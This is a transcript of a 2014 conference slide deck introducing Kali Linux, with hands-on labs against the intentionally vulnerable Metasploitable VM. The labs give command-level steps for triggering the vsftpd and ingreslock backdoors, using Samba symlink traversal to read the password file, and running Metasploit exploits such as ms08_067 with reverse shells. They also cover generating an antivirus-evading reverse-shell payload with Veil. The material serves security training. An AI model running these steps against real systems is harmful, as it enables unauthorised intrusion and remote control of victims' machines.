kali linux - falconer - iss 2014

141
What is Kali Linux? Information Security Summit 2014 Westlake, Ohio

Upload: tgodfrey

Post on 08-Jul-2015

993 views

Category:

Technology


1 download

DESCRIPTION

This is a presentation and how-to I gave at the Information Security Summit 2014.

TRANSCRIPT

Page 1: Kali Linux - Falconer - ISS 2014

What is Kali Linux?Information Security Summit 2014

Westlake, Ohio

Page 2: Kali Linux - Falconer - ISS 2014

Welcome to ISS 2014

Page 3: Kali Linux - Falconer - ISS 2014

Welcome

Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body

of knowledge of security administration, is a regular contributor to a variety of Linux

publications, and has written technical content for Linux education nation-wide at the college level.

He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and

System Forensics.

Page 4: Kali Linux - Falconer - ISS 2014

Welcome

Side Note:

I put a lot of extra materials, websites, & definitions in the ‘Notes’ section of this PPT.

Page 5: Kali Linux - Falconer - ISS 2014

Overview of Presentation

Intro, Description, How used, Background

Extra Info, Kali in a Box, Raspberry PI

Tools, Overview, & Conclusion

Setting up the Environments

CLI 101 / Tools 101

Kali 101, 201, & 301

Page 6: Kali Linux - Falconer - ISS 2014

Presentation on Kali LinuxIntro

Page 7: Kali Linux - Falconer - ISS 2014

Who or What is ‘Kali’?

Page 8: Kali Linux - Falconer - ISS 2014

Who is Kali?

Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively!

Anu Yadavalli

Page 9: Kali Linux - Falconer - ISS 2014

Hindu Kali

Page 10: Kali Linux - Falconer - ISS 2014

What is Kali Linux?

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.

Page 11: Kali Linux - Falconer - ISS 2014

BackTrack?

Kali Linux is the ‘rebirth’ of BackTrack Linux. This is a custom distribution designed for security testing for all skill levels from novice to expert. It is the largest collection of wireless hacking, server exploiting, web application assessing, social-engineering tools available in a single Linux distribution.

Page 12: Kali Linux - Falconer - ISS 2014

Developers - March 12, 2013

“Seven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution.”

Page 13: Kali Linux - Falconer - ISS 2014

Developers - March 12, 2013

“After a year of silent development, we are incredibly proud to announce the release and public availability of “Kali Linux“, the most advanced, robust, and stable penetration testing distribution to date.

Kali is a more mature, secure, and enterprise-ready version of BackTrack Linux.”

Page 14: Kali Linux - Falconer - ISS 2014

Warning!

Kali Linux’s developers would like everyone to use Kali Linux. But, Kali is a Linux distribution specifically geared towards professional penetration testing and security auditing and as such. It is NOTa recommended distribution for those unfamiliar with Linux.

Page 15: Kali Linux - Falconer - ISS 2014

Hardware / Software

Kali likes its own dedicated hardware. If you are learning about Kali and penetration testing (Metaspolitable) then a virtualized environment may be a consideration. VMware Player 5 works well and set the RAM to 1gb.

Page 16: Kali Linux - Falconer - ISS 2014

Hardware / Software

Kali recommends 10gb for the initial install, 512MB RAM min, i386/AMD64, CD/DVD / USB support.

Now…if ‘Veil’ is installed (+ 10gb) and doing the updates/upgrades (+ 5gb), and don’t forget the Alfa antenna.

Page 17: Kali Linux - Falconer - ISS 2014

http://www.kali.org/

Page 18: Kali Linux - Falconer - ISS 2014
Page 19: Kali Linux - Falconer - ISS 2014
Page 20: Kali Linux - Falconer - ISS 2014

Other guys?

Page 21: Kali Linux - Falconer - ISS 2014

Other guys? BackBox

BackBox is an Ubuntu-based distribution developed to perform penetration tests and security assessments. It provides a minimal yet complete desktop environment, thanks to its own software repositories, which are always updated to the latest stable versions of the most often used and best-known ethical hacking tools.

Page 22: Kali Linux - Falconer - ISS 2014

Other guys? Pentoo

Pentoo is a Live CD/USB designed for penetration testing and security assessment. Based on Gentoo, it is provided both as 32/64 bit installable livecd. It features packet injection patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment.

Page 23: Kali Linux - Falconer - ISS 2014

Other guys? BlackBuntu

BlackBuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security. Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It's currently being built using the Ubuntu 10.10.

Page 24: Kali Linux - Falconer - ISS 2014

Other guys? EnGarde

EnGarde Secure Linux was designed to support features suitable for individuals, students, security enthusiasts, and those wishing to evaluate the level of security and ease of management available in Guardian Digital enterprise products.

Page 25: Kali Linux - Falconer - ISS 2014

Other guys? A few more….

Page 26: Kali Linux - Falconer - ISS 2014

Presentation on Kali LinuxCategories & Websites

Page 27: Kali Linux - Falconer - ISS 2014

What’s in the box, Pandora?

Page 28: Kali Linux - Falconer - ISS 2014

There are several categories

Top 10 Security ToolsInformation GatheringVulnerability Analysis

Web Applications / Password AttacksWireless Attacks / Exploitation Tools

Sniffing/Spoofing / Maintaining AccessReverse Engineering

Stress Testing / Hardware HackingForensics / Reporting Tools

System Services

Page 29: Kali Linux - Falconer - ISS 2014

Metapackages also exist

Page 30: Kali Linux - Falconer - ISS 2014

Kali InformationSee ‘Notes’ section in this slide

Page 32: Kali Linux - Falconer - ISS 2014

Kali & More PenTestingSee ‘Notes’ section in this slide

Page 34: Kali Linux - Falconer - ISS 2014

Kali-specific WebsitesSee ‘Notes’ section in this slide

Page 36: Kali Linux - Falconer - ISS 2014

Kali PublicationsSee ‘Notes’ section in this slide

Page 38: Kali Linux - Falconer - ISS 2014

Kali in a box?

Do you want to run Kali on tablet or phone?http://www.kali.org/how-to/kali-linux-android-linux-deploy/

Page 39: Kali Linux - Falconer - ISS 2014

Kali in a box?

Basically….

1.Get a tablet1. Install ‘Linux Deploy’ 2. Install Samsung Kies on PC3. Tablet - USB Debugging ON4. Install SuperOneClick on PC5. Wait 5 minutes…6. Done

Page 40: Kali Linux - Falconer - ISS 2014

Kali + Nexus = NetHunter

Do you want to run Kali on a Nexus?http://www.kali.org/kali-linux-nethunter/

Page 41: Kali Linux - Falconer - ISS 2014

Kali on a Nexus?

Page 42: Kali Linux - Falconer - ISS 2014

Kali & Lifehacker

How to hack your own network and beef up its security with Kali Linux

http://lifehacker.com/how-to-hack-your-own-network-and-

beef-up-its-security-w-1649785071

Page 43: Kali Linux - Falconer - ISS 2014

Kali & Raspberry PISee ‘Notes’ section in this slide

Page 44: Kali Linux - Falconer - ISS 2014
Page 45: Kali Linux - Falconer - ISS 2014
Page 46: Kali Linux - Falconer - ISS 2014

What is Metaspolitable?See ‘Notes’ section in this slide

Page 47: Kali Linux - Falconer - ISS 2014

Metaspolitable?

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

The default login and password is msfadmin:msfadmin.

Page 48: Kali Linux - Falconer - ISS 2014

Presentation on Kali LinuxDVD, Tools, Demo

Page 49: Kali Linux - Falconer - ISS 2014

What’s on the DVD?

/books◦Official Kali Guide

◦eForensics◦Other published materials

/media◦7-Zip, kali_iso, metaspolitable doc, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager

/PPT

Page 50: Kali Linux - Falconer - ISS 2014

Legend

We’re going to type something

We’re going to make a note

Might be a question?

We’re going to click on something

Recon Attack

Page 51: Kali Linux - Falconer - ISS 2014

traceroute

traceroute

Essentially, ‘tracert’ in Windows

traceroute –i eth0 <Target IP>

It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network

Page 52: Kali Linux - Falconer - ISS 2014

nmap

nmap –p0-65535 <Target IP> | less

A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network

Page 53: Kali Linux - Falconer - ISS 2014

nmap

nmap –sS –Pn –A <Target IP>

A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack.

Page 54: Kali Linux - Falconer - ISS 2014

rpcinfo

rpcinfo –p <Target IP>

A utility makes a Remote Procedure Call (RPC) to an RPC server and reports

what it finds. It lists all programs registered with the port mapper on the

specified host.

Page 55: Kali Linux - Falconer - ISS 2014

tcpdump

On Kali…

tcpdump –I eth0 src <Target IP>

On Metaspolitable…ping www.yahoo.comopen a Browser & go to CNN.com

Page 56: Kali Linux - Falconer - ISS 2014

nikto

On Kali

nikto –h <Target IP>

Its an Open Source (GPL) web server scanner which performs

comprehensive tests against web servers for multiple items, including over

6700 potentially dangerous files/CGIs, checks for outdated versions of over

1250 servers, and version specific problems on over 270 servers.

Page 57: Kali Linux - Falconer - ISS 2014

whatweb

From Kali

whatweb <Target IP>

whatweb –v <Target IP>

whatweb –a 4 <Target IP>

WhatWeb recognizes web technologies including content management

systems (CMS), blogging platforms, statistic/analytics packages, JavaScript

libraries, web servers, and embedded devices.

Page 58: Kali Linux - Falconer - ISS 2014

Zenmap

Let’s run Zenmap

Applications Kali Linux

Information Gathering

DNS Analysis

Zenmap

Page 59: Kali Linux - Falconer - ISS 2014

SHODAN

Let’s run SHODAN

Open a browser

www.shodanhq.com

type in ‘almost anything’

…Be very nervous…

Page 60: Kali Linux - Falconer - ISS 2014

dmitry

If you want something more basic…dmitry

dmitry –s <domain.com>

It gives you site names & IP’s

Page 61: Kali Linux - Falconer - ISS 2014

Presentation on Kali LinuxFinal Thoughts

Page 62: Kali Linux - Falconer - ISS 2014
Page 63: Kali Linux - Falconer - ISS 2014

Thank you

Thank you for your time.

Falconer Technologies

[email protected]

877 / TUX RULZ or 877 / 889-7859

Page 64: Kali Linux - Falconer - ISS 2014

Use your powers for good

Page 65: Kali Linux - Falconer - ISS 2014

Thank You

Page 66: Kali Linux - Falconer - ISS 2014

The second part of this slide deck covers more tools and hands-on.

Page 67: Kali Linux - Falconer - ISS 2014

Presentation on Kali LinuxLab #1 & Prep

Page 68: Kali Linux - Falconer - ISS 2014

Getting Ready…

- Let’s make a folder called kali_2014

- Copy the DVD contents into that folder- Install 7-Zip- Install VMware Player

Let’s make sure the virtual environments are working and can ‘ping’ each other

Page 69: Kali Linux - Falconer - ISS 2014

VMware Player

Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.

Page 70: Kali Linux - Falconer - ISS 2014

Logins / Passwords

Kali Login rootKali Password password

Metaspolitable Login msfadminMetaspolitable Password msfadmin

Download Metaspolitable from: http://sourceforge.net/projects/metasploitable/

Page 71: Kali Linux - Falconer - ISS 2014

Metaspolitable V/E

Login msfadmin Password msfadmin

ifconfig

Jot down the IP & Netmask route

Jot down the Gateway

Page 72: Kali Linux - Falconer - ISS 2014

Metaspolitable V/E

Virtual Environment #1◦Metaspolitable

Go to TERMINALrlogin –l root <IP Address>cd /tmpls -l ...vs... ls -la

rm .X0-lock

startx

Page 73: Kali Linux - Falconer - ISS 2014

Kali V/E

Login root Password password

ifconfig

Jot down the IP & Netmask route

Jot down the Gateway

Page 74: Kali Linux - Falconer - ISS 2014

Kali V/E

Go to:

Applications System Tools Preferences System Settings Display Resolution: ____

Then…[Apply]

Page 75: Kali Linux - Falconer - ISS 2014

Kali Updating

From the command line, type

apt-get update && apt-get upgrade

Note: This has already been done to save time, but should be done after a new installation.

Page 76: Kali Linux - Falconer - ISS 2014

Presentation on Kali LinuxLab #2 – Command Line Tools

Page 77: Kali Linux - Falconer - ISS 2014

Command Line ToolsPresentation on Kali Linux

Page 78: Kali Linux - Falconer - ISS 2014

Legend

We’re going to type something

We’re going to make a note

Might be a question?

We’re going to click on something

Recon Attack

Page 79: Kali Linux - Falconer - ISS 2014

ping

ping

Packet InterNet GroperPort = 8

Establishes physical connectivity between two entities

(from Kali) ping <Target IP>

Did it echo back?

Page 80: Kali Linux - Falconer - ISS 2014

top

top

Tells us what services are running, processes, memory allocation

Basically, a live system monitor

Page 81: Kali Linux - Falconer - ISS 2014

df

df

Tells us how much space is available or ‘disk free’

Page 82: Kali Linux - Falconer - ISS 2014

du

du

Tells us how much space is taken or ‘disk used’.

You can get a shorter report by…

‘du –s’ … (disk used –summary)

Page 83: Kali Linux - Falconer - ISS 2014

free

free

How much ‘free’ memory is available

Page 84: Kali Linux - Falconer - ISS 2014

ls

ls

This is for ‘list’

ls –l (list –long) ls -la (list – long – all attributes)

Page 85: Kali Linux - Falconer - ISS 2014

pwd

pwd

Directory structure

Means ‘path to working directory’ or ‘print working directory’

Page 86: Kali Linux - Falconer - ISS 2014

ps / ps aux / pstree

ps

Means ‘Process Status’◦aux – auxiliary view◦pstree – shows parent/child relationships

◦Windows – tasklist / taskkill

Kill - Stops a process (ex: kill PID)

Page 87: Kali Linux - Falconer - ISS 2014

Presentation on Kali LinuxLab #3 – CLI & Services

Page 88: Kali Linux - Falconer - ISS 2014

CLI & ServicesPresentation on Kali Linux

Page 89: Kali Linux - Falconer - ISS 2014

traceroute

traceroute

Essentially, ‘tracert’ in Windows

traceroute –i eth0 <Target IP>

It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network

Page 90: Kali Linux - Falconer - ISS 2014

nmap

nmap –p0-65535 <Target IP> | less

A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network

Page 91: Kali Linux - Falconer - ISS 2014

nmap

nmap –sS –Pn –A <Target IP>

A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack.

Page 92: Kali Linux - Falconer - ISS 2014

rlogin (from Metaspolitable)

rlogin –l root <Target IP>

whoami

tcpdump -i eth0 host <Target IP>

A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

Page 93: Kali Linux - Falconer - ISS 2014

rpcinfo

rpcinfo –p <Target IP>

A utility makes a Remote Procedure Call (RPC) to an RPC server and reports

what it finds. It lists all programs registered with the port mapper on the

specified host.

Page 94: Kali Linux - Falconer - ISS 2014

showmount

showmount –e <Target IP>

showmount –a <Target IP>

It displays a list of all clients that have remotely mounted a file system from a

specified machine in the Host parameter. This information is maintained by

the [mountd] daemon on the Host parameter.

Page 95: Kali Linux - Falconer - ISS 2014

telnet

telnet <Target IP> 21

After '220...'

user backdoored:)

<CTRL><]>

quit

Port 20/21 is FTP

Page 96: Kali Linux - Falconer - ISS 2014

telnet

telnet <Target IP> 6200

After 'Escape character...',

id;

<CTRL><]>

quit

Port 6200 - Oracle Notification Service remote port Oracle Application Server

Page 97: Kali Linux - Falconer - ISS 2014

telnet

telnet <Target IP> 6667

IRC (Internet Relay Chat)

Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP,

Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan,

Vampire, Moses, Maniacrootkit, kaitex, EGO.

Page 98: Kali Linux - Falconer - ISS 2014

telnet

telnet <Target IP> 1524

After 'root@meta....',

id

Many attack scripts install a backdoor shell at this port (especially those

against Sun systems via holes in sendmail and RPC services like statd,

ttdbserver, and cmsd). Connections to port 600/pcserver also have this

problem. Note: ingreslock, Trinoo; talks UDP/TCP.

Page 99: Kali Linux - Falconer - ISS 2014

Presentation on Kali LinuxLab #4 – Working w/Metaspolitable

Page 100: Kali Linux - Falconer - ISS 2014

smbclient

smbclient –L <//Target IP>

msfconsole...wait, wait, wait..., then

use auxiliary/admin/smb/samba_symlink_traversal

set RHOST <Target IP>

set SMBSHARE tmp

Page 101: Kali Linux - Falconer - ISS 2014

smbclient

exploit

...Connecting to the server.....

...<yadda, yadda, yadda>...

...Auxiliary module....

At the prompt, type exit

Page 102: Kali Linux - Falconer - ISS 2014

smbclient

smbclient //<Target IP>/tmp

Do you get the 'smb: \>' prompt? cd rootfs cd etc more passwd

Do you get a list of all user accts?

Page 103: Kali Linux - Falconer - ISS 2014

tcpdump

On Kali…

tcpdump –I eth0 src <Target IP>

On Metaspolitable…ping www.yahoo.comopen a Browser & go to CNN.com

Page 104: Kali Linux - Falconer - ISS 2014

netdiscover

On Kali

netdiscover –i eth0 –r <Target IP>/24

Netdiscover is an active/passive address reconnaissance tool, mainly

developed for those wireless networks without DHCP server, when you are

wardriving. It can be also used on hub/switched networks.

Page 105: Kali Linux - Falconer - ISS 2014

nikto

On Kali

nikto –h <Target IP>

Its an Open Source (GPL) web server scanner which performs

comprehensive tests against web servers for multiple items, including over

6700 potentially dangerous files/CGIs, checks for outdated versions of over

1250 servers, and version specific problems on over 270 servers.

Page 106: Kali Linux - Falconer - ISS 2014

sqlmap

On Kali

sqlmap –u http://<Target IP> --dbs

It is an open source penetration testing tool that automates the process of

detecting and exploiting SQL injection flaws and taking over of database

servers.

Page 107: Kali Linux - Falconer - ISS 2014

Wasp Services

From Kali – open IceWeasel

http://<Target IP>/

Research: Multillidae <p. 8>

The Mutillidae are a family of more than 3,000 species of wasps (despite the

names) whose wingless females resemble large, hairy ants. Their common

name ‘velvet ant’ refers to their dense pile of hair which most often is bright

scarlet or orange, but may also be black, white, silver, or gold.

Page 108: Kali Linux - Falconer - ISS 2014

Web Services

From Kali – open IceWeasel

http://<Target IP>/

Research: Multillidae <p. 8>

Mutillidae is a free, open source web application provided to allow security

enthusiest to pen-test and hack a web application

Page 109: Kali Linux - Falconer - ISS 2014

whatweb

From Kali

whatweb <Target IP>

whatweb –v <Target IP>

whatweb –a 4 <Target IP>

WhatWeb recognizes web technologies including content management

systems (CMS), blogging platforms, statistic/analytics packages, JavaScript

libraries, web servers, and embedded devices.

Page 110: Kali Linux - Falconer - ISS 2014

Presentation on Kali LinuxLab #5 - msfconsole

Page 111: Kali Linux - Falconer - ISS 2014

From Kali - msfconsolePresentation on Kali Linux

Page 112: Kali Linux - Falconer - ISS 2014

msfconsole

From Kali

service postgresql start

service metasploit start

msfconsole

Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole

We will then take a look at the built-in exploit tools

Page 113: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console

help search

show exploits

search dns

‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in

exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.

Page 114: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console

search Microsoft

search diablo

search irc

search http

Let’s try a few more to see what they do….

Page 115: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console, search for ‘unreal’

info <exploit>

use <exploit>

show options

LHOST, RHOST, LPORT, RPORT

Page 116: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console (ex: unreal)

set RHOST <IP Address>

show options

exploit

Page 117: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console, search for ‘twiki’

info <exploit>

use <exploit>

show options

LHOST, RHOST, LPORT, RPORT

Page 118: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console (ex: ‘twiki’)

set RHOST <IP Address>

show options

exploit

Page 119: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console, (target: Win XP)

use exploit/windows/smb/ms08_067_netapi

show options

show targets

set target 2

Page 120: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console, (target: Win XP)

show options

show advanced

show targets

show payloads

Page 121: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console, (target: Win XP)

set payload windows/shell_reverse_tcp

show options

set LHOST <Kali IP Address>

set RHOST <Target IP Address>

Page 122: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console, (target: Win XP)

show options

exploit

Any errors?

Page 123: Kali Linux - Falconer - ISS 2014

Presentation on Kali LinuxLab #6 – more GUI

Page 124: Kali Linux - Falconer - ISS 2014

From Kali – more GUIPresentation on Kali Linux

Page 125: Kali Linux - Falconer - ISS 2014

Zenmap

Let’s run Zenmap

Applications Kali Linux

Information Gathering

DNS Analysis

Zenmap

Page 126: Kali Linux - Falconer - ISS 2014

SHODAN

Let’s run SHODAN

Open a browser

www.shodanhq.com

type in ‘almost anything’

…Be very nervous…

Page 127: Kali Linux - Falconer - ISS 2014

FERN

Let’s run FERN

Kali Linux

Wireless Attacks

Wireless Tools

fern-wifi-cracker

Page 128: Kali Linux - Falconer - ISS 2014

recon-ng

Kali has many built-in tools, but you can always install more (Debian-based). But, you may always wish to add more such as recon-ng.

recon-ngautomated info gathering and network reconnaissance.

Page 129: Kali Linux - Falconer - ISS 2014

recon-ng

Let’s run recon-ng…

cd /opt/recon-ng

/usr/bin/python recon-ng

show modules

recon/hosts/gather/http/web/google_site

Page 130: Kali Linux - Falconer - ISS 2014

recon-ng

Let’s run recon-ng…

set DOMAIN <domain.com>

run (…let this run awhile…)

back (…previous level…)

show modules

Page 131: Kali Linux - Falconer - ISS 2014

recon-ng

Let’s run recon-ng…

use reporting/csv

run

Will add your new information to

/usr/share/recon-ng/workspaces/default

Page 132: Kali Linux - Falconer - ISS 2014

dmitry

If you want something more basic…dmitry

dmitry –s <domain.com>

It gives you site names & IP’s

Page 133: Kali Linux - Falconer - ISS 2014

veil

Kali has many built-in tools, but you can always install even more (Debian-based). You may always wish to add more such as veil.

veilRemote shell payload generator that can bypass many anti-virus programs.

Page 134: Kali Linux - Falconer - ISS 2014

veil

Let’s run veil

veil-evasion

list (available payloads list)

use 13 (powershell/VirtualAlloc)

generate

Page 135: Kali Linux - Falconer - ISS 2014

veil

Let’s run veil

1 (msfvenom)

[ENTER] (accept default)

Value for LHOST (Target IP)

Value for LPORT (ex: 4000)

Page 136: Kali Linux - Falconer - ISS 2014

veil

Let’s run veil

Output name (“Squatch”)

It will store this new batch file to the /usr/share/veil/output/source

folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.

Page 137: Kali Linux - Falconer - ISS 2014

Presentation on Kali LinuxFinal Thoughts

Page 138: Kali Linux - Falconer - ISS 2014
Page 139: Kali Linux - Falconer - ISS 2014

Thank you

Thank you for your time.

Falconer Technologies

[email protected]

877 / TUX RULZ or 877 / 889-7859

Page 140: Kali Linux - Falconer - ISS 2014

Use your powers for good

Page 141: Kali Linux - Falconer - ISS 2014

Thank You